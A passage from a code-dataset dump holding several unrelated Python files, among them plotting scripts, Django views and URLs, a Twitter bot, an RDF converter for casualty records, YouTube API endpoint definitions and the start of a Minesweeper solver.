np.array(list(dao.getTempo(modelo2,cartas,unidades)))\nlista3 = np.array(list(dao.getTempo(modelo3,cartas,unidades)))\n\nprint(lista1)\nprint(lista2)\nprint(lista2[1])\nprint(lista3)\n\n# Calculate the average\nif unidades==1:\n    lista1_mean = np.mean(lista1)\nlista2_mean = np.mean(lista2)\nlista3_mean = np.mean(lista3)\n\n# Calculate the standard deviation\nif unidades==1:\n    lista1_std = np.std(lista1)\nlista2_std = np.std(lista2)\nlista3_std = np.std(lista3)\n\n# Define labels, positions, bar heights and error bar heights\nif unidades!=1:\n    labels = ['Modelo 2', 'Modelo 3']\n    x_pos = np.arange(len(labels))\n    CTEs = [lista2_mean, lista3_mean]\n    error = [lista2_std, lista3_std]\nelse:\n    labels = ['Modelo 1', 'Modelo 2', 'Modelo 3']\n    x_pos = np.arange(len(labels))\n    CTEs = [lista1_mean, lista2_mean, lista3_mean]\n    error = [lista1_std, lista2_std, lista3_std]\n\n# Build the plot\nfig, ax = plt.subplots()\nax.bar(x_pos, CTEs,\n       yerr=error,\n       align='center',\n       alpha=0.5,\n       ecolor='black',\n       capsize=10)\nax.set_ylabel('Tempo(segundos)')\nax.set_xticks(x_pos)\nax.set_xticklabels(labels)\nax.set_title('Modelo Linear')\nax.yaxis.grid(True)\n\n\n# Save the figure and show\nplt.tight_layout()\nplt.savefig('modelosLineares-'+str(cartas)+'-'+str(unidades)+'.png')\nplt.show()\n\nf = open('modelosLineares-'+str(cartas)+'-'+str(unidades)+'.txt','w')\nf.write('Media\\n')\nif unidades==1:\n    f.write('modelo 1:'+str(lista1_mean)+\"\\n\")\nf.write('modelo 2:'+str(lista2_mean)+\"\\n\")\nf.write('modelo 3:'+str(lista3_mean)+\"\\n\")\nf.write('Desvio Padrao\\n')\nif unidades==1:\n    f.write('modelo 1:'+str(lista1_std)+\"\\n\")\nf.write('modelo 2:'+str(lista2_std)+\"\\n\")\nf.write('modelo 3:'+str(lista3_std)+\"\\n\")\nf.close()\n","sub_path":"src/myDeckToolVisualizations/modelosLineares/plotLinearModels.py","file_name":"plotLinearModels.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"469545599","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport settings\nfrom string import Template\nfrom core.storage.adapters import fetch_raw\nfrom utils.parse import ConfigLoader\nfrom utils.products import get_working_directory, mkdir_if_not_exist\n\n# 39 points for profile and 68 points for the front\nFRONT_POINT_NUM = 68\nPROFILE_POINT_NUM = 39\n\npts_template = Template(\"\"\"version: 1\nn_points: $point_num\n{\n$point_pairs\n}\n\"\"\")\n\ndef is_profile_face(points):\n\treturn any(filter(lambda x: x.startswith('-'), points))\t\t# the redundant points are negative for profiles\n\ndef refine(queryset):\n\tresult = {}\n\tdata = queryset[1:]\n\tfor line in data:\n\t\titems = line.strip().split('\\t')\n\t\timage_name, point_list = items[0], items[-1].split(',')\n\n\t\tif is_profile_face(point_list):\n\t\t\tpoint_list = point_list[:PROFILE_POINT_NUM*2]\t# only 39 points were to keep\n\n\t\tif len(point_list) != FRONT_POINT_NUM*2 and len(point_list) != PROFILE_POINT_NUM*2: \n\t\t\tprint(\"error: only %d points were given for %s\" % (len(point_list)//2, image_name))\n\t\t\tsys.exit(1)\n\n\t\tresult[image_name] = list(map(lambda x: x.replace('*', '-'), point_list))\n\treturn result\n\n# pts is a special format only including version, n_points, and points surrounded with a bracket\ndef export_pts(result, path):\n\tfor image, points in result.items():\n\t\tpoint_pairs = []\n\t\tfor i in range(0, len(points), 2):\n\t\t\tpoint_pairs.append(str(points[i])+' '+str(points[i+1]))\n\n\t\timage_path = os.path.join(path, 
os.path.splitext(image)[0]+'_0.pts')\n\t\twith open(image_path, 'w') as f:\n\t\t\tf.write(pts_template.substitute(point_num=len(point_pairs), point_pairs='\\n'.join(point_pairs)))\n\ndef main():\n config = ConfigLoader()\n title = config.project['title']\n product = config.project['product']\n\n queryset = fetch_raw(title)\n result = refine(queryset)\n product_path = os.path.join(get_working_directory(), product)\n mkdir_if_not_exist(product_path)\n export_pts(result, product_path)\n \n\t\ndef usage():\n return \"exports data for Face annotation - 68 for front and 39 for profile\"","sub_path":"src/apps/app_face6839.py","file_name":"app_face6839.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97920266","text":"from django.urls import path\nfrom .views import (\n create_order, order_detail, orders\n \n )\napp_name = 'orders'\n\nurlpatterns = [\n path('orders', orders, name='orders'),\n path('order/create', create_order, name='create_order'),\n path('order/', order_detail, name='order_detail'),\n]\n","sub_path":"orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159615252","text":"# TkVertexLayout struct\n\nfrom .Struct import Struct\n\nSTRUCTNAME = 'TkVertexLayout'\n\nclass TkVertexLayout(Struct):\n def __init__(self, **kwargs):\n\n \"\"\" Contents of the struct \"\"\"\n self.ElementCount = kwargs.get('ElementCount', None)\n self.Stride = kwargs.get('Stride', None)\n self.PlatformData = kwargs.get('PlatformData', None)\n self.VertexElements = kwargs.get('VertexElements', None)\n \"\"\" End of the struct contents\"\"\"\n\n \"\"\" Run code to convert struct contents into self.data_dict \"\"\"\n self._create_dict()\n\n # Parent needed so that it can be a SubElement of something\n self.parent = None\n self.STRUCTNAME = STRUCTNAME\n","sub_path":"nms_imp/classes/TkVertexLayout.py","file_name":"TkVertexLayout.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584718910","text":"import os\nfrom django.db.models import Max\nimport TwitterAPI\nfrom .models import (TwitterUser, Tweet, HashTag)\n\n\nclass Twitterbot(object):\n\n consumer_key = 'Ktp2lfQ69lw6ZIfJjr1w3JBq5'\n consumer_secret = os.environ.get('TWITTERAPI_CONSUMER_SECRET', None)\n api = None\n response = None\n first_time = True\n twitter_account = None\n tweet_count = None\n\n def __init__(self, tweet_count=200, twitter_account='stackdevjobs'):\n\n self.tweet_count = tweet_count\n self.twitter_account = twitter_account\n\n self.api = TwitterAPI.TwitterAPI(\n self.consumer_key,\n self.consumer_secret,\n auth_type='oAuth2'\n )\n\n def readTweets(self):\n for tweet in self.response.get_iterator():\n if tweet['text'] and tweet['entities']['hashtags']:\n if self.first_time:\n \"\"\"Parse for the user info during the first call\"\"\"\n \n twitteruser, tu_ok = TwitterUser.objects.get_or_create(\n descriptive_name=tweet['user']['name'],\n twitter_handle=tweet['user']['screen_name'],\n profile_img_url=tweet['user']['profile_image_url'],\n url=tweet['user']['url']\n )\n\n self.first_time = False\n\n # save the tweet\n tw, tw_ok = Tweet.objects.get_or_create(\n text=tweet['text'],\n created_at=tweet['created_at'],\n message_id=tweet['id'],\n user=TwitterUser.objects.last()\n )\n\n # look for hashtags\n for tag in 
tweet['entities']['hashtags']:\n hashtag, created = HashTag.objects.get_or_create(\n name=tag['text'],\n tweet=Tweet.objects.last())\n\n def refresh(self):\n # make the request\n self.response = self.api.request(\n 'statuses/user_timeline',\n {'screen_name': self.twitter_account,\n 'count': self.tweet_count})\n\n self.readTweets()\n\n\n\"\"\" def getHashTags(self):\n return self.hashtags.keys()\n\n def getHashTagData(self):\n return self.hashtags\n\n def getTweets(self, hashtag=None):\n if not hashtag:\n return self.tweets\n else:\n return self.filterTweets(hashtag)\n\n def filterTweets(self, hashtag):\n return [tweet for tweet in self.tweets if hashtag in tweet['hashtags']]\n\"\"\"\n","sub_path":"melbproject/jobflow/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"317866052","text":"import argparse\nimport os\nimport yaml\nfrom src.process import Process\n\nclass Start():\n \n def __init__(self, config):\n\n name_yml = os.path.abspath(config)\n with open(name_yml, 'r') as ymlfile:\n self.cfg = yaml.load(ymlfile,Loader=yaml.BaseLoader)\n\n PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n LOGS_DIR = os.path.join(PROJECT_ROOT, 'log')\n PHOTOS_DIR = os.path.join(PROJECT_ROOT, 'photos')\n\n self.photos_dir = PHOTOS_DIR\n\n if not os.path.exists(LOGS_DIR):\n os.makedirs(LOGS_DIR)\n if not os.path.exists(PHOTOS_DIR):\n os.makedirs(PHOTOS_DIR)\n\n def main(self):\n Process(self.cfg, self.photos_dir).process()\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-cfg','--config',default='./config.yml')\n args = parser.parse_args()\n config = args.config\n\n Start(config).main()","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200734838","text":"# importing pandas, setting tmp_data for pandas to read csv file, then transfering file to numpy as data.\nimport pandas as pd\ntmp_data = pd.read_csv('Dataset.csv')\ndata = tmp_data.to_numpy()\n# setting up a function that will print only the unique names from the Location list\ndef unique(num): \n assert num >= 0, \"Input a column number\"\n # Creating a list called cols that contains all the data from the col\n cols = (data[:, num]).tolist()\n # new empty list\n unique_list = [] \n # for any city in col\n for ii in cols: \n # it will be appended to list if it's not in unique list\n if ii not in unique_list: \n unique_list.append(ii) \n # returns the list\n return unique_list\n# testing the function with my data\nprint(unique(1)) # seeing the unique locations\n# setting a function that will count a list\ndef count(numb1, numb2):\n assert numb1 >= 0, \"Input a column number\"\n assert numb2 >= 0, \"Input a column number\"\n # creating a new list of lists called bicols that has data from 2 cols\n bicols = (data[:, [numb1,numb2]]).tolist()\n # converting list of lists to list of tuples so it is easier for the program to find uniques/count. 
\n bicols = [tuple(i) for i in bicols]\n check = False\n # need new empty list\n new_list = [] \n ii = 0\n # for loop checking if entry in new_list exists.\n for x in bicols: \n if x in new_list: \n check = True\n continue\n # if entry is not there it will append it, if there, it will not re-append it but will increase the count of ii\n else: \n ii = 0\n #\n for y in bicols: \n if y[0] == x[0] and y[1] == x[1]: \n ii = ii + 1\n # printing the number of occurences only for entries with multiple occurences \n if(ii > 1): \n print(x, \"-\", ii) \n new_list.append(x) \n if check == False: \n # let's me know if an entry does not repeat\n print(\"No repeats\")\n# testing the function\n# ran function successfully on Location_Species\ncount(1,2)\ndef mass_plotting(xdata, ystart, yend):\n assert xdata >= 0, \"Input x column data\"\n assert ystart >= 0, \"Input y starting column\"\n assert yend >= 0, \"Input y ending column\"\n # importing matplotlib.pyplot as plt since I need it later\n import matplotlib.pyplot as plt\n # creating a list of all the column names located in header\n header_list = list(tmp_data)\n # since there are several columns describing the climate an individual tree is in,\n # and I want to compare foliar area to all of them, I made a function to plot Foliar Area vs. all of the climate columns\n # for loop searches through columns 19-57 which are the climate ones\n for column in range(ystart, yend):\n column_list = (data[:, [xdata,column]]).tolist()\n assert column_list != 0, \"Columns contain no data\"\n # made a list of tuples in [(x,y)] format\n column_list = [tuple(i) for i in column_list]\n xval = [x[0] for x in column_list]\n yval = [y[1] for y in column_list]\n # plotted with appropriate x and y labels\n plt.scatter(xval,yval)\n plt.xlabel(header_list[xdata])\n plt.ylabel(header_list[column])\n plt.show()\n# testing the function\nmass_plotting(9, 19, 57)\n# function below uses the csv module and DictReader to have every row be a dictionary where the keys are the header names.\n# This function only goes to row 10 (which can be changed)\n# it's useful to have in case I need this for any row I want. 
\ndef open_with_dict(file):\n # importing csv module\n import os\n assert os.path.exists(file) == True\n import csv\n with open(file) as f:\n # assigning shorter name to csv.DictReader(f)\n reader = csv.DictReader(f)\n for i, row in enumerate(reader):\n # printing key (header name) and value\n print(dict(row))\n # assignming breaks between dictionaries so it's easier to read\n print(\"\\n\")\n # this number is only to stop if from being two long, the actual file will be longer\n if i > 10:\n break\n# testing the function\nopen_with_dict(\"Dataset.csv\")\n# A lot of the climate data had the same values since many came from the same area\n# I want to count all the occurances for a value for all the climate data columns\n# This function counts the occurances for columns 9-56, and pushes the counts to a dictionary for each column\ndef count_to_dict(ystart, yend):\n for column in range(ystart,yend):\n header_list = list(tmp_data)\n # for loop searches through columns 19-57 which are the climate ones\n column_list = tmp_data[\"{}\".format(header_list[column])].tolist() # {}.format used since column names change\n count_dict = dict() # new dict\n # for loop finds all the occurances of an element and assigns the value as frequency of the element (key)\n for ii in column_list:\n count_dict[ii] = count_dict.get(ii, 0) + 1\n print(count_dict) # printing dict for one column\n print(\"\\n\") # helps to space them out\n# testing the function\ncount_to_dict(19, 57)\n","sub_path":"python-scripting/Dataset_script.py","file_name":"Dataset_script.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519989061","text":"from django.shortcuts import render , redirect\nfrom letsdo.forms import EmployeeForm\nfrom letsdo.models import Employee\n\n\n# Create your views here.\ndef emp(request):\n if request.method == \"GET\":\n print(\"djjd------------------------==========\")\n form = EmployeeForm(request.GET)\n\n if form.is_valid():\n try:\n form.save()\n return redirect(\"/show\")\n except:\n pass\n\n\n else:\n form = EmployeeForm()\n return render(request,\"index.html\",{'form':form})\n\ndef show(request):\n employees=Employee.objects.all()\n print(employees)\n return render(request,\"show.html\",{'employees':employees})\n\n\ndef edit(request, id):\n employee = Employee.objects.get(id=id)\n return render(request,\"edit.html\",{'employee' : employee } )\n\n\ndef update(request, id):\n employee = Employee.objects.get(id=id)\n form = EmployeeForm(request.GET, instance=employee)\n if form.is_valid():\n form.save()\n return redirect('/show')\n return render(request,\"edit.html\", {'employee': employee })\n\n\ndef delete(request, id):\n print(id,\"=================================\")\n employee=Employee.objects.get(id=id)\n employee.delete()\n return redirect(\"/show\")\n\n\n\n","sub_path":"letsdo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436625946","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport argparse\nimport datetime\nimport logging\nimport pandas as pd\n\nfrom rdflib import URIRef, Graph, Literal, RDF, XSD\nfrom mapping import CASUALTY_MAPPING, GRAVEYARD_MAPPING\nfrom namespaces import DCT, SKOS, SCHEMA_CAS, SCHEMA_WARSA, bind_namespaces, CEMETERIES, DATA_CAS\n\n\nclass RDFMapper:\n \"\"\"\n Map tabular data (currently pandas DataFrame) to RDF. 
Create a class instance of each row.\n \"\"\"\n\n def __init__(self, mapping, instance_class, cemeteries=(), loglevel='WARNING'):\n self.mapping = mapping\n self.instance_class = instance_class\n self.table = None\n self.data = Graph()\n self.schema = Graph()\n # self.errors = pd.DataFrame(columns=['nro', 'sarake', 'virhe', 'arvo'])\n self.errors = []\n self.cemeteries = cemeteries\n\n logging.basicConfig(filename='casualties.log',\n filemode='a',\n level=getattr(logging, loglevel),\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n self.log = logging.getLogger(__name__)\n\n def map_row_to_rdf(self, entity_uri, row, person_id=None):\n \"\"\"\n Map a single row to RDF.\n\n :param entity_uri: URI of the instance being created\n :param row: tabular data\n :param person_id:\n :return:\n \"\"\"\n row_rdf = Graph()\n row_errors = []\n\n # Loop through the mapping dict and convert data to RDF\n for column_name in self.mapping:\n\n mapping = self.mapping[column_name]\n value = row[column_name]\n\n value = str(value).strip()\n conv_error = None\n original_value = value\n\n converter = mapping.get('converter')\n validator = mapping.get('validator')\n value = converter(value) if converter else value\n conv_error = validator(value, original_value) if validator else None\n\n name = ' '.join(row[1:3])\n\n if conv_error:\n row_errors.append([person_id, name, column_name, conv_error, original_value])\n\n if value not in [None, '']:\n if type(value) == datetime.date:\n rdf_value = Literal(value, datatype=XSD.date)\n elif type(value) == URIRef:\n rdf_value = value\n else:\n rdf_value = Literal(value)\n\n if mapping.get('value_uri_base'):\n rdf_value = URIRef(mapping['value_uri_base'] + value)\n\n row_rdf.add((entity_uri, mapping['uri'], rdf_value))\n\n if row_rdf:\n row_rdf.add((entity_uri, RDF.type, self.instance_class))\n row_rdf = self.convert_graveyards(entity_uri, row_rdf)\n else:\n # Don't create class instance if there is no data about it\n logging.debug('No data found for {uri}'.format(uri=entity_uri))\n row_errors.append([person_id, name, '', 'Ei tietoa henkilöstä', ''])\n\n for error in row_errors:\n self.errors.append(error)\n\n return row_rdf\n\n def convert_graveyards(self, uri, graph: Graph):\n \"\"\"\n Convert graveyard information into URIs. 
Check if the created URI exists in cemeteries ontology.\n \"\"\"\n mun = graph.value(uri, SCHEMA_CAS.municipality_of_burial)\n if not mun or str(mun) == 'X':\n return graph\n\n gy = graph.value(uri, SCHEMA_CAS.graveyard_number)\n gy_uri = '{base}h{mun}'.format(base=CEMETERIES, mun=str(mun).split('/k')[-1])\n # mun_uri = '{base}k{mun}'.format(base=KUNNAT, mun=mun)\n if gy:\n gy_uri += '_{gy}'.format(gy=gy)\n else:\n return graph\n\n gy_uri = URIRef(GRAVEYARD_MAPPING.get(gy_uri, gy_uri))\n\n if gy_uri not in self.cemeteries:\n logging.info('Cemetery {gy} not found for person {p}'.format(gy=gy_uri, p=uri))\n return graph\n\n if str(gy).isnumeric():\n graph.add((uri, SCHEMA_WARSA.buried_in, gy_uri))\n\n graph.remove((uri, SCHEMA_CAS.graveyard_number, gy))\n\n return graph\n\n def read_csv(self, csv_input):\n \"\"\"\n Read in a CSV files using pandas.read_csv\n\n :param csv_input: CSV input (filename or buffer)\n \"\"\"\n def strip_upper(value):\n return value.strip().upper() if value else None\n\n def stripper(value):\n return value.strip() if value != '' else None\n\n def x_stripper(value):\n return value.strip() if value.strip() not in ['x', ''] else None\n\n csv_data = pd.read_csv(csv_input, encoding='UTF-8', index_col=False, sep=',', quotechar='\"',\n # parse_dates=[1], infer_datetime_format=True, dayfirst=True,\n na_values=[' '],\n converters={\n 'AMMATTI': lambda x: x.lower().strip(),\n 'ASKUNTA': x_stripper,\n 'KIRJKUNTA': x_stripper,\n 'HAAVKUNTA': x_stripper,\n 'KATOKUNTA': x_stripper,\n 'KUOLINKUNTA': x_stripper,\n 'SKUNTA': x_stripper,\n 'HKUNTA': x_stripper,\n 'HMAA': stripper,\n 'HPAIKKA': stripper,\n 'KANSALLISUUS': strip_upper,\n 'KANSALAISUUS': strip_upper,\n 'LASTENLKM': stripper,\n 'JOSKOODI': stripper,\n 'JOSNIMI': stripper,\n # 0: lambda x: int(x) if x and x.isnumeric() else -1\n })\n\n self.table = csv_data.fillna('').applymap(lambda x: x.strip() if type(x) == str else x)\n logging.info('Read {num} rows from CSV'.format(num=len(self.table)))\n self.log.info('Data read from CSV %s' % csv_input)\n\n def serialize(self, destination_data, destination_schema):\n \"\"\"\n Serialize RDF graphs\n\n :param destination_data: serialization destination for data\n :param destination_schema: serialization destination for schema\n :return: output from rdflib.Graph.serialize\n \"\"\"\n bind_namespaces(self.data)\n bind_namespaces(self.schema)\n\n data = self.data.serialize(format=\"turtle\", destination=destination_data)\n schema = self.schema.serialize(format=\"turtle\", destination=destination_schema)\n self.log.info('Data serialized to %s' % destination_data)\n self.log.info('Schema serialized to %s' % destination_schema)\n\n return data, schema # Return for testing purposes\n\n def process_rows(self):\n \"\"\"\n Loop through CSV rows and convert them to RDF\n \"\"\"\n for index in self.table.index:\n person_id = self.table.ix[index][0]\n person_uri = DATA_CAS['p' + str(person_id)]\n row_rdf = self.map_row_to_rdf(person_uri, self.table.ix[index][1:], person_id=person_id)\n if row_rdf:\n self.data += row_rdf\n\n for prop in self.mapping.values():\n self.schema.add((prop['uri'], RDF.type, RDF.Property))\n if 'name_fi' in prop:\n self.schema.add((prop['uri'], SKOS.prefLabel, Literal(prop['name_fi'], lang='fi')))\n if 'name_en' in prop:\n self.schema.add((prop['uri'], SKOS.prefLabel, Literal(prop['name_en'], lang='en')))\n if 'description_fi' in prop:\n self.schema.add((prop['uri'], DCT.description, Literal(prop['description_fi'], lang='fi')))\n\n error_df = pd.DataFrame(columns=['nro', 
'nimi', 'sarake', 'virhe', 'arvo'], data=self.errors)\n error_df.to_csv('output/errors.csv', ',', index=False)\n\n\nif __name__ == \"__main__\":\n\n argparser = argparse.ArgumentParser(description=\"Process casualties CSV\", fromfile_prefix_chars='@')\n\n argparser.add_argument(\"input\", help=\"Input CSV file\")\n argparser.add_argument(\"cemeteries\", help=\"Input cemeteries turtle file\")\n argparser.add_argument(\"--outdata\", help=\"Output file to serialize RDF dataset to (.ttl)\", default=None)\n argparser.add_argument(\"--outschema\", help=\"Output file to serialize RDF schema to (.ttl)\", default=None)\n argparser.add_argument(\"--loglevel\", default='INFO', help=\"Logging level, default is INFO.\",\n choices=[\"NOTSET\", \"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"])\n\n args = argparser.parse_args()\n\n cemetery_uris = list(Graph().parse(args.cemeteries, format='turtle').subjects())\n mapper = RDFMapper(CASUALTY_MAPPING, SCHEMA_WARSA.DeathRecord, cemeteries=cemetery_uris,\n loglevel=args.loglevel.upper())\n mapper.read_csv(args.input)\n\n mapper.process_rows()\n\n mapper.serialize(args.outdata, args.outschema)\n","sub_path":"src/csv_to_rdf.py","file_name":"csv_to_rdf.py","file_ext":"py","file_size_in_byte":9086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"188158880","text":"from txgoogleapi.base import GoogleApi, GoogleApiEndPoint, SET, BOOL, INT\n\n\nclass Playlists(GoogleApiEndPoint):\n _url = '/playlists'\n _methods = {\n 'list': {\n 'method': 'GET',\n 'required': {\n 'part': SET('id', 'snippet', 'status'),\n },\n 'filter': {\n 'channelId': str,\n 'id': str,\n 'mine': BOOL,\n },\n 'optional': {\n 'maxResults': INT,\n 'onBehalfOfContentOwner': str,\n 'onBehalfOfContentOwnerChannel': str,\n 'pageToken': str\n },\n },\n 'insert': {\n 'method': 'POST',\n 'required': {\n 'part': SET('snippet', 'status'),\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n 'onBehalfOfContentOwnerChannel': str,\n },\n },\n 'update': {\n 'method': 'PUT',\n 'required': {\n 'part': SET('snippet', 'status'),\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n },\n },\n 'delete': {\n 'method': 'DELETE',\n 'required': {\n 'id': str,\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n },\n },\n }\n\n\nclass PlaylistItems(GoogleApiEndPoint):\n _url = '/playlistItems'\n _methods = {\n 'list': {\n 'method': 'GET',\n 'required': {\n 'part': SET('id', 'snippet', 'contentDetails', 'status'),\n },\n 'filter': {\n 'id': str,\n 'playlistId': str,\n },\n 'optional': {\n 'maxResults': INT,\n 'onBehalfOfContentOwner': str,\n 'pageToken': str,\n 'videoId': str,\n },\n },\n 'insert': {\n 'method': 'POST',\n 'required': {\n 'part': SET('snippet', 'contentDetails', 'status'),\n },\n 'optional': {\n 'onBehalfOfContentOwner': str,\n },\n },\n 'update': {\n 'method': 'PUT',\n 'required': {\n 'part': SET('snippet', 'contentDetails', 'status'),\n },\n },\n 'delete': {\n 'method': 'DELETE',\n 'required': {\n 'id': str,\n },\n },\n }\n\n\nclass YoutubeV3(GoogleApi):\n _url = '/youtube/v3'\n _apis = {\n 'playlists': Playlists,\n 'playlistItems': PlaylistItems,\n }\n","sub_path":"txgoogleapi/youtube_v3.py","file_name":"youtube_v3.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"86989492","text":"import argparse\nimport csv\nimport dateutil.parser\nimport os\nimport re\n\nparser = argparse.ArgumentParser(description='Build jekyll 
posts')\nparser.add_argument('input', help='csv file with post variables')\nparser.add_argument('template', help='string template for making posts')\nparser.add_argument('output', help='output directory')\n\nif __name__ == '__main__':\n    args = parser.parse_args()\n\n    with open(args.template) as fin:\n        template = fin.read()\n\n    with open(args.input) as fin:\n        for row in csv.DictReader(fin):\n            date = dateutil.parser.parse(row['date'])\n            title = re.sub(r'\\W+', '-', row['title'].lower())\n            filename = (args.output + '/' + date.strftime('%Y-%m-%d-') +\n                        title + '.md')\n            if not os.path.exists(os.path.dirname(filename)):\n                try:\n                    os.makedirs(os.path.dirname(filename))\n                except OSError as exc:  # Guard against race condition\n                    import errno  # errno was missing from the top-level imports\n                    if exc.errno != errno.EEXIST:\n                        raise\n            with open(filename, 'w') as fout:\n                fout.write(template.format(**row))\n","sub_path":"_postbuilder/postbuilder.py","file_name":"postbuilder.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362963351","text":"def cluster_config(flags):\n\tDEFAULT_PORT = 6777\n\tn_nodes, node_id, n_ps = flags.n_nodes, flags.node_id, flags.n_ps\n\tconfig = {}\n\tconfig['ps_hosts'] = ['master:%d' % DEFAULT_PORT]\n\tconfig['worker_hosts'] = []\n\thost_base = 'node0'\n\tfor i in range(1, n_nodes):\n\t\tif i < n_ps:\n\t\t\tn_str = str(i) if i >= 10 else '0' + str(i)\n\t\t\tconfig['ps_hosts'].append(host_base + n_str + ':' + str(DEFAULT_PORT + i))\n\t\telse:\n\t\t\tn_str = str(i) if i >= 10 else '0' + str(i)\n\t\t\tconfig['worker_hosts'].append(host_base + n_str + ':' + str(DEFAULT_PORT + i))\n\n\tif node_id < n_ps:\n\t\tconfig['job'] = 'ps'\n\t\tconfig['task_id'] = node_id\n\telse:\n\t\tconfig['job'] = 'worker'\n\t\tconfig['task_id'] = node_id - n_ps\n\n\treturn config","sub_path":"ignore/new/cartpole/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217883883","text":"import random\nimport sys\nimport tkinter as tk\nimport math\nimport matplotlib.pyplot as plt\nimport datetime as t\nfrom threading import Thread\n\n# increasing recursion limit\nsys.setrecursionlimit(100000)\n\n\nclass MineSweeper1(object):\n    \"\"\"\n    In this class, actual computation and minesweeper generation take place\n    This class creates the basic layout of the minesweeper board using the constructor. 
It checks if the opened cell is\n safe (S) or a mine (M) and updates the information for each cell accordingly, until all the cells are opened.\n \"\"\"\n\n # Constructor with 3 arguments, size of minesweeper, the mine density and the mode\n def __init__(self, size, mdensity, mode):\n self.size = size\n self.mode = mode\n self.mdensity = mdensity\n\n # Creates the minesweeper board\n self.cells = set((x, y)\n for x in range(self.size)\n for y in range(self.size))\n\n # Getting number of mines\n mines_number = self.getmines()\n self._mines = set() # to keep track of the mines detected by the agent\n # Setting mines at random locations\n while len(self._mines) < mines_number:\n self._mines.add((random.randrange(size),\n random.randrange(size)))\n\n # For each square, gives the set of its neighbours\n # ni = not identified\n # neighbour = List of neighbors\n # neighbours = Length of neighbors\n # Status = Status of cell (It can be C = Covered, M = Mined, S = Safe)\n # Clue = Provides number of mines around specific locations\n self.data = {} # data to keep track of required parameters\n for (x, y) in self.cells: # for all the cells in the board, get their neighbors and update each cell's data\n neighbour = self.getneighbour(x, y)\n self.data[x, y] = {\"neighbour\": neighbour, \"neighbours\": len(neighbour), \"status\": \"C\", \"clue\": \"ni\"}\n # Environment data:\n self.empty_remaining = size * size - mines_number # number of non-mines\n # Maintain list of opened cells.\n self.opened = set()\n # flags the identified mine.\n self.flagged = set()\n # Maintain list of safe cells to generate hints.\n self.safe = []\n # Keep track of mines for which all neighbors have been identified\n self.solved = set()\n # If it was a mine, it will be 'mine' instead of a number.\n self.mines_busted = set()\n\n def open(self, xy):\n \"\"\"\n Opens the cell at (x, y) location and checks whether it is a mine or safe\n \"\"\"\n if xy in self.opened: # if the cell is already open, do nothing\n return\n\n self.opened.add(xy) # add to the list of opened cells\n if xy in self._mines: # if mine, update status to M\n self.mines_busted.add(xy) # add to mines busted\n self.data.get(xy)[\"status\"] = \"M\"\n else:\n # Updating the clue\n self.data.get(xy)[\"status\"] = \"S\" # otherwise update status as safe\n # Updating clue based on mines found in the cell's neighbors\n self.data.get(xy)[\"clue\"] = len(self.data[xy].get(\"neighbour\") & self._mines)\n self.empty_remaining -= 1 # decrease number of non-mines by 1\n # Checking the condition of winning for test mode, displays the winning scenario\n if self.empty_remaining <= 0 and self.mode == \"T\":\n self.win()\n\n def flag(self, xy):\n \"\"\"\n function to flag (mark) the cell denoted by xy\n \"\"\"\n self.flagged.add(xy) # adds the cell to the flagged set\n\n def getneighbour(self, x, y):\n \"\"\"\n returns the list of neighbors for the cell (x, y)\n \"\"\"\n # Check to the left and right of that cell to retrieve its neighbors and return them\n neigh = set((nx, ny) for nx in [x - 1, x, x + 1] for ny in [y - 1, y, y + 1] if (nx, ny) != (x, y) if\n (nx, ny) in self.cells)\n return neigh\n\n def getmines(self):\n \"\"\"\n returns the number of mines based on the user input size of the minesweeper board\n \"\"\"\n # Number of mines is determined by (mine density * size of the board)\n return math.floor(self.mdensity * (self.size ** 2))\n\n def updateinformation(self):\n \"\"\"\n updates the information for the cells in the board\n \"\"\"\n # for all the cells in the board 
